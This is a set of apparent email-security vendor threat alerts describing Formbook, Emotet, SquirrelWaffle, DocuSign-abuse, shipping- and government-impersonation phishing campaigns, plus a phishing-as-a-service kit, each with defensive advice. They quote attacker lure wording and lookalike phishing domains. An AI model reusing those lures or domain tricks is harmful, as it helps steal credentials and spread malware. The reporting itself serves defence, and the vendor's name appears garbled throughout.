Threat Alert

Formbook Loader Distributed in Three “Extremely Aggressive” Email Attacks

admin — Wed, 16 Feb 2022 04:32:36 +0000

Formbook Loader Distributed in Three “Extremely Aggressive” Email Attacks admin Tue, 02/15/2022 - 22:32 Threat Alert David Bisson

Malicious actors launched three “extremely aggressive” email attacks in which they attempted to distribute samples of the Formbook loader.

Campaign #1: A Fake Wire Transfer Notice

Troy Gill, manager of security research at ��Ƶɫ | AppRiver, explained that Formbook has regularly made an appearance on the security firm’s systems since late 2021.

“Our malware filters have been capturing some extremely aggressive Formbook loader attacks over the past few months using multiple different ruses attempting to dupe recipients,” he said.

The firm detected the first attack email in mid-January. It arrived with the subject line “Wire request initiated,” and it used spoofing techniques to make the message appear as if it had originated from an American multinational financial services company.

Screenshot of the first Formbook-laden attack email. (Source: ��Ƶɫ | AppRiver)

The email informed the recipient that the financial services company had begun processing a wire funds transfer request from their account. It went on to explain that the recipient could cancel the wire transfer by downloading a Word document. Once opened, the file downloaded a Formbook sample onto the recipient’s machine.

Campaign #2: A Bogus Letter of Dismissal

The ��Ƶɫ | AppRiver team came across the second Formbook attack campaign a few days later.

Using the subject line “Letter of Dismissal,” those who crafted the email claimed to be an unnamed “HR Manager” to try to convince the recipient that their employer was letting them go.

Screenshot of the phony dismissal letter. (Source: ��Ƶɫ | AppRiver)

“Due to the affect of covid-19 epidemic in our company, we have no choice but to end your employment with us because we cannot service all the employees anymore,” the email stated.

The message went on to inform the recipient that the company had sent along a two-month salary receipt as an attachment. When opened, however, the attached .RAR file dropped Formbook as a payload on the victim’s computer.

Campaign #3: A Counterfeit Purchase Order

The final Formbook campaign came in the form of a minimalist attack email. It instructed the recipient to view a screenshot of a made-up purchase order embedded in the message.

Screenshot of the final Formbook attack email (Source: ��Ƶɫ | AppRiver)

Those responsible for the campaign included the screenshot in their email to try to trick the recipient into opening a Formbook-laden Excel spreadsheet.

An Ongoing Relationship with Formbook

The attacks discussed above aren’t the first Formbook operations detected by ��Ƶɫ | AppRiver in the past couple of years.

Back in April 2020, for instance, the ��Ƶɫ | AppRiver team witnessed email attackers impersonating the U.S. Small Business Association (SMA). The malicious actors used that guise to trick the recipient into thinking they had received an SBA grant so that they would open an attachment. If the recipient complied, the campaign initially delivered the Remcos remote access trojan before eventually dropping Formbook.

It was about a year later when ��Ƶɫ | AppRiver flagged two additional Formbook operations. The first delivered the threat using malicious macros inside a deed-themed Word document. The other leveraged an “approved order” as a lure to deliver an executable file that began the Formbook infection process upon execution.

Defending Against Formbook Attacks

The attack campaigns discussed above highlight how organizations need to strengthen their email security postures against digital threats like Formbook. One of the ways they can do that is by investing in an email security solution that can scan incoming messages for malware signatures and other threat indicators. This type of solution, when combined with regular security awareness training, will help to prevent threats from gaining a foothold in employees’ inboxes, all while allowing legitimate messages to reach their intended destination.

Attackers Targeting Mortgage Servicers to Steal Email Accounts Credentials

admin — Wed, 09 Feb 2022 21:41:07 +0000

Attackers Targeting Mortgage Servicers to Steal Email Accounts Credentials admin Wed, 02/09/2022 - 15:41 Threat Alert David Bisson

Digital attackers are targeting mortgage servicers and their clients to try to steal victims’ email account credentials.

Data Theft as a Final Payoff=

At the end of January, the ��Ƶɫ | AppRiver team flagged an email informing the recipient that they needed to submit a mortgage payment prior to the date contained in an attached payoff statement.

“Attached” is an odd choice of words here considering that the email didn’t arrive with an attached file. Instead, it arrived with an embedded hyperlinked button named, “Access Payoff Statement File Here.”

Screenshot of the mortgage-themed attack email. (Source: ��Ƶɫ | AppRiver)

Misleading wording wasn’t the only element that gave the attack email away as a fake. As seen in the screenshot included above, the message came with a signature block indicating that it had originated from a nationwide mortgage lender service…with the exception of the physical address. That location pointed to another mortgage service entirely.

Other signs gave away this discrepancy. For instance, the sender email address ended with .EDU—an unusual domain for an established mortgage service company. ��Ƶɫ | AppRiver reasoned that those responsible for this attack likely compromised the account of someone working at an educational institution to conduct their campaign.

Not only that, but the phone number included in the signature block didn’t belong to the mortgage lender specifically mentioned in the message or the other company whose address appeared in the email. A Google search of the number didn’t yield any meaningful results.

Following the Button

Clicking on the embedded button redirected the recipient to a website that appeared to be a page operated by the named mortgage lender service. The page used stolen branding to convince the recipient to click on an “Payoff Statement Access Here” button so that they could view an “encrypted payoff mortgage file.”

Once again, however, the jump page gave itself away as a fake. How? By the inclusion of a statement indicating that whoever built the website did so using site123[.]me, a service for building free websites.

Screenshot of the jump page. (Source: ��Ƶɫ | AppRiver)

Given its profile in the mortgage lending field, the targeted service likely relies on its own web team—not a free website builder—to maintain its digital presence.

It’s therefore not surprising that the jump page didn’t present a mortgage payoff statement to the user. Instead, it redirected them to a phishing landing page with an even more suspicious domain name to try to steal their email account credentials.

Screenshot of the phishing landing page. (Source: ��Ƶɫ | AppRiver)

Keeping a Fixed Email Security Focus for the Long Term

Troy Gill, manager of security research at ��Ƶɫ | AppRiver, doesn’t think that email attackers will refrain from using mortgages as a lure anytime soon.

“Business email compromise attacks targeting mortgage servicers and their clients continue to be an ongoing threat to customers,” he said. “The simplicity of the attack along with the low barrier to entry with a quick payoff keeps it an enticing vector for attackers.”

That’s especially not the case with mortgages haven’t just leapt up to nearly 4% in recent weeks—the highest they’ve been since October 2019, reported Mortgage News Daily.

Acknowledging that reality, organizations need to take action to defend themselves against mortgage-themed campaigns. They can do so by using security awareness training to educate their employees about common tactics and slip-ups committed by email attackers. They can then complement those measures with an email security solution that can scan incoming messages for malware signatures and other threat indicators, blocking suspicious messages before they reach an employee’s inbox while allowing legitimate messages to reach their intended destination.

Microsoft Exchange Servers Hacked to Distribute SquirrelWaffle

admin — Mon, 06 Dec 2021 21:35:27 +0000

Microsoft Exchange Servers Hacked to Distribute SquirrelWaffle admin Mon, 12/06/2021 - 15:35 Threat Alert David Bisson

Digital attackers hacked organizations’ vulnerable Microsoft Exchange Servers to distribute SquirrelWaffle malware.

Details of the Attack Campaign

In mid-November 2021, Trend Micro examined the initial access vector for several digital intrusions that occurred in the Middle East.

The security firm’s incident response team determined that all the attacks originated from on-premises Microsoft Exchange Servers. A closer look uncovered evidence of malicious actors having exploited ProxyLogon and ProxyShell on those resources.

One of those campaigns leveraged conversation hijacking, a tactic executed by the Emotet gang more than once, to inject themselves into existing email threats. Those responsible for the attack also used true account names from the victim’s domain for the sender and the recipient. In doing so, they increased the chances that someone would follow the email’s instructions.

The malicious spam email received by targets. (Source: Trend Micro)

As is evident in the above screenshot, the email didn’t exactly relay its instructions eloquently.

“Our specialists composed desired document and I send it to you,” it informed the recipient. “Document can be found through this link.”

Trend Micro went on to inspect the headers for the attack emails. They discovered that the mail path was internal between three Exchange Servers’ mailboxes. The threat actor didn’t drop any tools for moving laterally. They also didn’t execute malware on the Exchange servers that would have triggered alerts before the emails spread across the environment.

“The attacker exploited the Exchange servers to deliver internal mails,” Trend Micro explained. “This was all done to catch users off-guard, making them more likely to click the link and open the dropped Microsoft Excel or Word file.”

Both links embedded in the malicious emails dropped a .ZIP file containing a Microsoft Excel sheet or Word document. Once downloaded, the documents used malicious Excel 4.0 macros to download and execute a malicious DLL related to Qbot (otherwise known as “QakBot”). This infection ultimately led the campaign to infect the machine with “SquirrelWaffle.”

Squirrel-What?

SquirrelWaffle first made news in late October when Cisco Talos spotted some spam campaigns infecting systems with the new malware loader. Upon successful infection, SquirrelWaffle granted threat actors the foothold they needed to infiltrate organizations’ systems and network environments as well as to conduct additional compromise attempts and malware infections.

The ��Ƶɫ | AppRiver team observed this exact behavior in a SquirrelWaffle campaign that took place in mid-November.

Like the operation detected by Trend Micro, the malicious actors behind this attack attempt used conversating hijacking techniques to inject themselves into an existing email thread with the subject line “Re: S.A.M. Newark Lay out.”

The attackers said that they had “uploaded some additional info regarding the recent contract and payslip.” They went on to instruct the recipient that they could resolve a previously mentioned problem if they chose to “follow steps via the link lower.”

Screenshot of the November SquirrelWaffle email. (Source: ��Ƶɫ | AppRiver)

Clicking on either of the links led victims to a SquirrelWaffle payload. At that point, the malware followed up by dropping either QakBot or Cobalt Strike onto the infected machine.

Defending Against Email-Borne SquirrelWaffle Attacks

The attack instances discussed above highlight the need for organizations to defend themselves against SquirreWaffle. One of the ways they can do that is by reviewing their vulnerability management programs to make sure they’re prioritizing and implementing software patches on a timely basis. Regarding the campaign detected by Trend Micro, for example, Microsoft released a patch for ProxyLogon in March and similar fixes for ProxyShell a few months later. Organizations can then go on to pair their vulnerability management efforts with a multi-layered email security solution that scans incoming messages for potential threats.

Microsoft Password Expiration Scam Uses Customized Image to Steal Victims’ Account Details

admin — Mon, 29 Nov 2021 21:00:52 +0000

Microsoft Password Expiration Scam Uses Customized Image to Steal Victims’ Account Details admin Mon, 11/29/2021 - 15:00 Threat Alert David Bisson

A Microsoft password expiration scam used an image customized with a recipient’s email address and domain to steal their account credentials.

“Request (for Data Theft) Received”

In early November, ��Ƶɫ | AppRiver flagged an email that appeared to originate from the helpdesk at a recipient’s company. (The attackers included “HelpDesk” in their email’s subject line to support this ruse.)

But the email didn’t originate from a helpdesk team. Its sender line indicated that it came from a B2B platform serving the commercial real estate industry.

Using branding stolen from Microsoft, the attack email impersonated a password expiration notice and informed the recipient that their password was set to expire in seven days. It included the recipient’s name, domain, and email address to add a sense of legitimacy.

From there, the attack email instructed the recipient to “take the time now to maintain your password activity to avoid login interruption” by clicking on a “Keep My Password” button.

Screenshot of the fake Microsoft password expiration notice. (Source: ��Ƶɫ | AppRiver)

As you can see from the screenshot above, the email included the warning that “Microsoft will not be held responsible for any account loss.”

That’s an imperfect replication of Microsoft’s terms of service. These read as follows: “Microsoft will not be liable for any loss that you may incur as a result of someone else using your password or account, either with or without your knowledge. However, you could be held liable for losses incurred by Microsoft or another party due to someone else using your account or password.”

Now, this isn’t the first time ��Ƶɫ | AppRiver came across a Microsoft-themed password expiration scam. Not by a long shot. But it is the first instance where the security firm observed a specific tactic in play.

Here’s Troy Gill, manager of threat intelligence at ��Ƶɫ | AppRiver, with more.

“Instead of the normal text, it utilized an image link for the lure but the image itself was customized to contain the recipients email address and domain,” he explained. “It was also an automated attack being sent in large volumes indicating the attacker had an automated setup for these and not manually changing each image for the recipients.”

“Keep My Password”…Literally, You Can Take It

If a user complied with the attackers’ instructions and clicked on a customized image, the campaign redirected them to a phishing page that abused workers.dev as a means of living off the land (LotL) of Cloudflare’s reputation.

Screenshot of the phishing page abusing Cloudflare’s workers.dev. (Source: ��Ƶɫ | AppRiver)

Malicious actors continue to resort to LotL techniques as a way of evading detection. Back in September 2021, for instance, ��Ƶɫ | AppRiver came across an operation that abused DocuSign to trick victims into handing over their credentials for Outlook, Office365, or another email client.

This campaign doesn’t even include all the times where email attackers abused Azure, Sway, and other legitimate Microsoft services to phish victims’ details in recent years.

For this attack attempt, the phishing site impersonated a Microsoft login page that also included the victim’s domain and email address. The purpose of this personalization was to convince the victim that nothing was wrong.

Defending against a Fake Microsoft Password Expiration Email

The attack campaign described above highlights the need for organizations to defend themselves against Microsoft-themed email attacks. One of the ways they can do that is by familiarizing their employees with what an email from their helpdesk will actually look like. They can complement that security awareness with a multi-layered email security platform.

Emotet’s at It Again!

admin — Tue, 23 Nov 2021 21:13:33 +0000

Emotet’s at It Again! admin Tue, 11/23/2021 - 15:13 Threat Alert David Bisson

Emotet has resumed operations nearly 10 months after an international coordinated action took control of the botnet’s infrastructure.

A Familiar Tactic

On November 15, the ��Ƶɫ | AppRiver team detected 221 email attack attempts from a revived Emotet botnet.

Some of the instances scraped entire conversations, while others scraped the subject and sender. With those techniques, attackers granted themselves the ability to inject themselves into conversations involving individuals with whom the sender had already spoken. This increased the likelihood of the sender (now the recipient) following the attackers’ instructions.

The commands themselves weren’t flashy. In one of their emails, the attackers asked the recipient to “please open the attached document.”

Screenshot of one Emotet attack email. (Source: ��Ƶɫ | AppRiver)

Another instance came with the instruction to “Please see attached” as well as the offer of assistance should the recipient need anything more.

Screenshot of a second Emotet attack email. (Source: ��Ƶɫ | AppRiver)

This isn’t the first time that malicious actors have used this tactic to distribute Emotet. Back in May 2020, for instance, ��Ƶɫ | AppRiver flagged an email as part of a conversation hijacking attack involving a request for a trade reference and bank reference. Ultimately, the email used a .ZIP archive to deliver Qakbot, a common payload of Emotet.

All the attack attempts detected by ��Ƶɫ | AppRiver arrived with Microsoft Excel spreadsheets, Microsoft Word documents, or password-protected .ZIP archives containing Word documents. Those files contained malicious macros that, when enabled, dropped Emotet.

Upon execution, Brad Dunction at the SANS Internet Storm Center spotted something familiar.

“Infection traffic for Emotet is similar to what we saw before the takedown in January 2021,” explained in a blog post. “The only real difference is Emotet post-infection C2 is now encrypted HTTPS instead of unencrypted HTTP. My infected lab host turned into a spambot trying to push out more Emotet malspam.”

Things didn’t slow down with Emotet after November 15. The following day, ��Ƶɫ | AppRiver detected 1,819 attack attempts involving the botnet. Those instances then fell to 665 on November 17.

A Familiar Friend Lent Some Help

Just as a bit of recap, law enforcement agencies in the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine with international activity coordinated by Europol and Eurojust announced the seizure of Emotet’s infrastructure in January 2021. The botnet went quiet for 10 months after that.

So, how did the botnet come back online?

Per Bleeping Computer, “active Trickbot infections began dropping the Emotet loader on already infected devices, rebuilding the botnet for spamming activity” in mid-November.

Trickbot has an established history with Emotet. Back in April 2019, security researchers spotted the trojan families working together to infect unsuspecting users with Ryuk ransomware.

Emotet’s takedown didn’t slow down Trickbot, however. On the contrary, Check Point Research wrote in October 2021 that Trickbot had remained at the top of its most wanted malware list for five months straight.

How to Respond to Emotet’s Return

Emotet’s reemergence highlights the need for organizations to strengthen their security against email-based attacks. One of the ways they can do that is by investing in their email security awareness training program. Through regular education modules, organizations can inform their employees about conversation hijacking and other attack techniques used by spammers.

Organizations need to balance those human controls with technical security measures. Hence the need for a multi-layered email security solution. By scanning emails for malicious IPs and other threat indicators, organizations can automatically protect themselves against many email-based attacks—all while allowing legitimate correspondence to reach its intended destination.

Record-Setting DDoS Attack Highlights Malicious Actors’ Strategic Thinking

admin — Tue, 09 Nov 2021 23:36:05 +0000

Record-Setting DDoS Attack Highlights Malicious Actors’ Strategic Thinking admin Tue, 11/09/2021 - 17:36 Threat Alert David Bisson

In mid-October, Microsoft revealed that it had succeeded in mitigating a 2.4 terabyptes-per-second (Tbps) distributed denial-of-service (DDoS) attack against its own infrastructure.

The tech giant explained that the attack targeted an Azure customer in Europe back in August and that it lasted for over 10 minutes. During that period, traffic peaked for a short time at 2.4 Tbps. Microsoft documented two smaller traffic spikes at 0.55 Tbps and 1.7 Tbps after that, as reported by MSN.

What Is a DDoS Attack?

A DDoS attack is a type of operation where malicious actors use remote locations to target an organization’s online presence. It works by flooding a target’s websites and other public-facing infrastructure with HTTP requests and traffic. This can prevent legitimate users from accessing those resources, thereby disrupting the target’s business operations.

What makes DDoS attacks effective is the fact that they abuse the functionality of networking equipment and services like routers for malicious ends. Here’s the Computing Technology Industry Association (CompTIA) with how.

“Sophisticated DDoS attacks don’t necessarily have to take advantage of default settings or open relays,” the trade association explained. “They exploit normal behavior and take advantage of how the protocols that run on today’s devices were designed to run in the first place. In the same way that a social engineer manipulates the default workings of human communication, a DDoS attacker manipulates the normal workings of the network services we all rely upon and trust.”

These types of events aren’t rare—especially not this year. According to VentureBeat, security researchers documented 972,000 DDoS attacks in January 2021. That’s higher than any other month on record. By June, the volume of campaigns had dropped to 759,000. But that didn’t prevent an increase of 11% for DDoS attacks during the first half of the year compared to H1 2020, totaling 5.4 million. VentureBeat went on to note that DDoS attacks could reach a record-setting 11 million by December if the trend in H1 2021 continues for the rest of the year.

Putting DDoS Attacks into Context

DDoS attacks can be standalone incidents. But they don’t have to be. Take email bombs for example. This type of operation targets an inbox with a flood of emails. Those messages aren’t malicious; they don’t contain embedded links or attachments that contain malware or that redirect victims to a phishing page. But they do serve an important function for attackers.

David Picket, senior cybersecurity analyst at AppRiver, explains how.

“The bomb is typically designed to distract the user from emails generated due to fraudulent purchases or financial account updates or transactions,” Pickett pointed out. “During these type of attacks, we've observed fraudulent airline ticket purchases, Apple store orders, and quite a few Best Buy pickup orders. If applicable to the fraudulent purchase - such as a Best Buy pickup order, attackers have mules ready to quickly pick up the fraudulently purchased merchandise soon after the attack begins.”

Digital fraudsters aren’t the only ones who have been known to use DDoS attacks as part of their operations. According to Bleeping Computer, the HelloKitty ransomware gang began leveraging DDoS attacks as another extortion-based tactic in the beginning of November. This involves targeting an organization’s public-facing website with a DDoS attack if the victim doesn’t respond quickly enough or doesn’t pay the demanded ransom.

How to Defend Against DDoS Attacks

In its documentation, Microsoft explains that it uses its global presence and engagement with Internet providers, private corporations, and other security firms to defend against network-based DDoS attacks. Those partners include ��Ƶɫ, which complements Microsoft’s focus on productive and performance with email threat protection. Click here to learn more about how this layered security approach can help to defend your organization against DDoS attacks and other threats.

Phishers Impersonating Maersk Line to Steal Victims’ Email Credentials

admin — Tue, 02 Nov 2021 16:08:28 +0000

Phishers Impersonating Maersk Line to Steal Victims’ Email Credentials admin Tue, 11/02/2021 - 11:08 Threat Alert David Bisson

Phishers launched an attack campaign in which they impersonated Danish international container shipping company Maersk Line to steal victims’ email account credentials.

“Confirmation of Shipping Invoice” Scam

At the end of October, the ��Ƶɫ | AppRiver team flagged an email that appeared to have originated from Maersk Line

Those responsible for the campaign used stolen branding to impersonate the shipping giant. They even included the text “Best Global shipping company” in their message. As noted by FleetMon, Maersk Line won this exact distinction for at least 20 consecutive years at the Asian Freight & Supply Chain Awards (AFSCA).

Even so, the attackers slipped up a few times in their email.

First, they used inconsistent capitalization with “Best Global shipping company,” “Original copy of Shipping Docs,” and even the subject line “Confirmation of shipping Invoice,BL & Parking List [sic].” These errors might have raised a recipient’s suspicions.

Second, they used spoofing techniques to trick the recipient into thinking the email came from “Maersk Global Shipping,” with the sending email address “noreply@maersklineshipping[dot]com.” But that’s not a legitimate Maersk Line email address. Official correspondence from the shipping giant uses the domain “@maersk.com.”

Finally, the attackers included a signature block attributing their email to Mark Rosario of MaerskLine China. There appears to be a Mark Rosario who does work at Maersk. But according to this individual’s LinkedIn profile, he’s been associated with the company’s operations in Pakistan for over 20 years, not China.

Screenshot of the fake Maersk Line email. (Source: ��Ƶɫ | AppRiver)

The email instructed the recipient to view some original documents including an invoice, bill of lading, and packing list by clicking on an embedded “Download Confirmation” button.

Troy Gill, manager of security research at ��Ƶɫ | AppRiver, explains what happened next.

“If the user complies, they are directed to a very convincing phishing page located on labour.go[.]th,” he said. “The page cycles through different realistic-looking Maersk backgrounds with a sign-in screen overlayed to steal the users email credentials.”

Screenshot of the phishing landing page. (Source: ��Ƶɫ | AppRiver)

“Per whois DNS data, the domain itself appears to be a Thai government page managed by the Labour Protection and Welfare Department. We were also able to find that it has a history of over 3 years of being abused for phishing attacks, mostly Adobe themed in the past,” he added.

Putting This Attack into Context

The attack described above arrived amid ongoing global supply chain challenges caused by the pandemic. In June 2021, for instance, The White House explained that some industries had shrunk or closed in response to the events of 2020. Some businesses struggled to hire quickly enough as they tried to reopen, while others didn’t have enough inventory to immediately resume their previous levels of business activity.

These events help to explain why 36% of small businesses reported delays with domestic suppliers, according to a U.S. Census Small Business Pulse survey cited by The White House. It also helps to put other events such as abrupt price increases, shortages, and digital attack campaigns impersonating shipping companies into perspective.

“With so many shipping delays and supply shortages around the world, threat actors are eager to spoof logistics and supply chain companies hoping for an easy compromise,” Gill clarified.

Attacks such as the one discussed above didn’t begin with the pandemic, however. Back in May 2019, for example, Maersk published an article warning of a phishing scam where fraudsters used genuine Maersk employee names and positions when contacting customers to trick them into clicking on a link, downloading an attachment, and/or authenticating their information.

Such activity highlights the need for organizations to invest in employee security awareness training and invest in an email security solution capable of spotting new attack attempts.

DocuSign Abused by Phishers to Target Victims’ Email Account Credentials

admin — Tue, 19 Oct 2021 22:21:39 +0000

DocuSign Abused by Phishers to Target Victims’ Email Account Credentials admin Tue, 10/19/2021 - 17:21 Threat Alert David Bisson

Digital attackers launched a phishing campaign in which they abused DocuSign to steal victims’ email account credentials.

The Latest Living Off the Land Phishing Example

At the end of September, the ��Ƶɫ | AppRiver team flagged an email that arrived with the subject line “Please DocuSign: Proposal Shared Document Online.pdf.”

The screenshot below reveals that the attack email originated from DocuSign. Like other notifications sent out by the service, the email listed one of DocuSign’s North American Services (“DocuSign NA4 System”) as the sender. It also came from the legitimate sender email address “dse_NA4@docusign.net” used by DocuSign for official correspondence.

Screenshot of the attack email. (Source: ��Ƶɫ | AppRiver)

The body of the email appeared to be an invitation from one Arthur Frank of “Adf Law” for the recipient to review a document. As you can see from the broken grammar used by Arthur in his note to the recipient, something phishy was going on with this email.

“Attached you will find revised document from Adf Law,” the attackers said in the email. “Document is Microsoft protected therefore download to access the original file and advise.”

Clicking on the “Review Document” button redirected the victim to an HTML file hosted on DocuSign’s servers.

Screenshot of the fake Adobe Document download prompt. (Source: ��Ƶɫ | AppRiver)

Once downloaded, the HTML file brought up a credential harvesting page. It prompted the victim to sign in with Outlook, Office365, or another mail client for the purpose of reading a document hosted in Adobe Document Cloud.

Screenshot of the credential harvesting page. (Source: ��Ƶɫ | AppRiver)

Other Phishing Attempts Involving DocuSign

This isn’t the first time that digital attackers have abused DocuSign to conduct a phishing campaign. Back in August, for instance, news emerged of a campaign in which phishers leveraged DocuSign to host malicious links despite the service’s ongoing efforts to prevent such instances of abuse. TechRadar pointed out that digital attackers could specifically use steganography within a hosted file to deliver threats like malware or ransomware to evade those preventative measures, for instance. They could also use specific documents like PDFs to preserve embedded hyperlinks’ clickability—all while evading security checks employed by DocuSign and third-party email security solutions.

It was a few weeks later when DocuSign itself revealed it had observed a “new phishing campaign in which malicious URLs are being hidden in legitimate DocuSign envelopes.” That campaign used various senders and email addresses to send out the attack emails, and they arrived with subject lines such as “Important: Microsoft Email Maintenance Request,” “Bank Confirmation,” and “INVOICE.pdf."

How to Defend Against Phishers Abusing DocuSign

The attack campaigns described above highlight the need for organizations to defend against phishers using Living off the Land (LOTL) tactics to prey on DocuSign and other legitimate services. One of the ways they can do that is by using security awareness training to cultivate their employees’ level of suspicion for unexpected emails containing unknown attachments. With that said, they need to foster a culture where reporting these types of emails is encouraged and not overlooked or dismissed.

Simultaneously, organizations need to augment their technical capacity to defend against these types of emails. They can do so by investing in an email security solution that analyzes incoming messages on multiple levels including IP addresses, campaign patterns, and malware signatures. This analysis should occur in real time so that legitimate correspondence can reach its intended business destination without delay.

Learn how ��Ƶɫ | AppRiver can help to protect your organization against phishers leveraging LOTL techniques.

BulletProofLink Phishing-as-a-Service Came with 100+ Built-in Templates

admin — Tue, 12 Oct 2021 19:57:10 +0000

BulletProofLink Phishing-as-a-Service Came with 100+ Built-in Templates admin Tue, 10/12/2021 - 14:57 Threat Alert David Bisson

A new phishing-as-a-service (PhaaS) operation called “BulletProofLink” provides customers with over 100 templates mimicking popular brands and services.

An Overview of How PhaaS Works

PhaaS functions like Ransomware-as-a-Service in that it follows the software-as-a-service model. Per Microsoft, PhaaS groups provide template creation, hosting, and orchestration capabilities to their customers. These offerings lower the barrier of entry for someone looking to launch their own phishing campaigns.

Not all digital crime services are the same, however. RaaS operations enable attackers to access victims’ devices, but PhaaS schemes don’t. The latter only provide customers with untested credentials stolen from their victims.

Analyzing BulletProofLink’s Functionality

Microsoft reviewed the templates, services, and pricing structure offered by the BulletProofLink group. In the process, it found that the operation’s infrastructure included multiple sites maintained under several aliases such as “BulletProftLink.” Those sites included YouTube and Vimeo pages offering instructional ads. The groups infrastructure also included an online store that customers could use to register an account and sign up for a monthly subscription.

As you can see below, BulletProofLink went so far as to offer a 10% discount to new customers.

Screenshot of the BulletProofLink’s 10% welcome discount. (Source: Microsoft)

In its analysis of the operation, Microsoft found that BulletProofLink came with over 100 phishing templates for mimicking trusted entities such as mobile service providers, bank holding companies, international shipping organizations, electronic document services, and tech giants.

Whoever designed the operation’s templates did so to help them to evade detection from traditional security tools. Even so, they weren’t completely undetectable.

“… [T]he campaigns themselves can be identified with a mixture of phishing page source code, combined with the PHP password processing sites referenced therein, as well as the hosting infrastructure used in their larger-scale campaigns,” Microsoft clarified in its analysis. “These password-processing domains correlate back to the operator through hosting, registration, email, and other metadata similarities during domain registration.”

The Redmond-based company also found that BulletProofLink offered various hosting and support options to their customers…not to mention tiers of support. The PhaaS setup cost customers as much as $800 a month, for instance, while a one-time hosting link cost customers approximately $50. In the event one of their customers had a question, BulletProofLink’s handlers made it possible for them to get in contact using various methods including Skype, ICQ, forums, and chat rooms.

Analyzing a Campaign Created Using BulletProofLink

Microsoft examined one campaign that used the BulletProofLink phishing kit. It found that the attack impersonated its own logo and branding to convince the recipient that their password had expired. It then informed the recipient that they could change their password or continue using their current password by clicking on a hyperlinked “Keep Active Password” button.

Screenshot of the Microsoft impersonation email. (Source: Microsoft)

If clicked, the campaign redirected the recipient to an attacker-owned site that subsequently sent them to another site hosting the phishing page. That location contained a fake Outlook sign-in form. With the help of user-specific URLs and other tactics, the page stole the victim’s details.

How to Defend Against BulletProofLink-Enabled Campaigns

PhaaS operations such as BulletProofLink highlight the need for organizations to strengthen their email security posture. One of the ways that organizations can do that is by investing in an email security solution that’s capable of looking at multiple elements of an incoming email message such as campaign patterns, malicious IP addresses, and malware signatures. Such a tool should operate in real time so that regular business correspondence is unimpeded.

Defend against the rise of PhaaS groups like BulletProofLink with ��Ƶɫ | AppRiver.

Phishers Impersonate U.S. Transportation Department to Steal Victims’ Microsoft Credentials

admin — Thu, 07 Oct 2021 19:07:52 +0000

Phishers Impersonate U.S. Transportation Department to Steal Victims’ Microsoft Credentials admin Thu, 10/07/2021 - 14:07 Threat Alert David Bisson

Digital attackers launched a phishing campaign where they impersonated the U.S. Department of Transportation (USDOT) to steal victims’ Microsoft credentials.

An Attack Full of Attempts at Legitimacy

Covered by ZDNet, the phishing campaign came just a few weeks after the U.S. Senate passed a $1 trillion infrastructure bill in mid-August.

Those responsible for this operation tried to use this timing to their advantage. They did so by first registering the domain transportationgov[.]net for the purpose of sending out their phishing emails. (The actual domain for USDOT is transportation.gov.) The attackers used Amazon to register the domain on August 16, which was just before the campaign began.

In the attack emails themselves, the malicious actors informed a recipient that USDOT was inviting them to submit a bid for a department project by interacting with a hyperlinked button that read, “CLICK HERE TO BID.”

In the event a recipient complied and clicked the button, they found themselves redirected to the website transportation.gov.bidprocure.secure.akjackpot[.]com. The attackers no doubt crafted this domain in such a way that the visitor would see “transportation.gov” and think that they were safe. But transportation.gov isn’t the base domain; akjackpot[.]com is. This location hasn’t had anything to do with USDOT since someone first registered it in 2019. On the contrary, the domain appears to have hosted the website for an online casino that catered to Malaysians for some unknown period.

It’s unclear whether those who first registered akjackpot[.]com were responsible for this attack or whether the phishers compromised the domain.

Either way, the attackers used the site to display the following instructions: “Click on the BID button and sign in with your email provider to connect to the network.” Assuming the visitor did, the campaign then presented them with a website that replicated the HTML and CSS stolen from USDOT’s official site. The website came with a “CLICK HERE TO BID” button that, if clicked, displayed a dialog box designed to steal the visitor’s Microsoft credentials.

When the visitor first attempted to submit their credentials, the campaign presented them with a reCAPTCHA challenge while it secretly exfiltrated their details to the phishers. It displayed a fake error message on the second attempt before redirecting the visitor to the real USDOT site, thus giving attackers some time to assume control of their victim’s account and/or to monetize the stolen credentials on the dark web.

Defending Against Email Attacks Impersonating USDOT

The campaign discussed above highlights the need for organizations to defend themselves against email attacks impersonating U.S. government entities like USDOT. One of the ways they can do that is by updating their security awareness training programs to take deceptive phishing attacks into account. For instance, they can focus on educating their workforce that official U.S. government websites end in .GOV or .MIL instead of .NET or .COM. They can also emphasize the reality that governmental organizations such as USDOT rarely send out “cold emails” where they directly invite recipients to submit bids for work. Finally, they can round off that education by discussing the suspicion that surrounds the registration of lookalike domains like transportation[.]net as well as highlighting why employees need to look out for situations that prompt them to view a document by signing into web services like Microsoft.

Simultaneously, organizations need to balance those human controls with multiple layers of technical controls. Those security measures include multi-factor authentication (MFA) and single sign on (SSO). They also include the use of an email security solution that’s capable of scanning incoming messages for campaign patterns and other threat indicators in real time, thus allowing legitimate correspondence to reach its intended destination.

Defend against impersonation email attacks using ��Ƶɫ | AppRiver.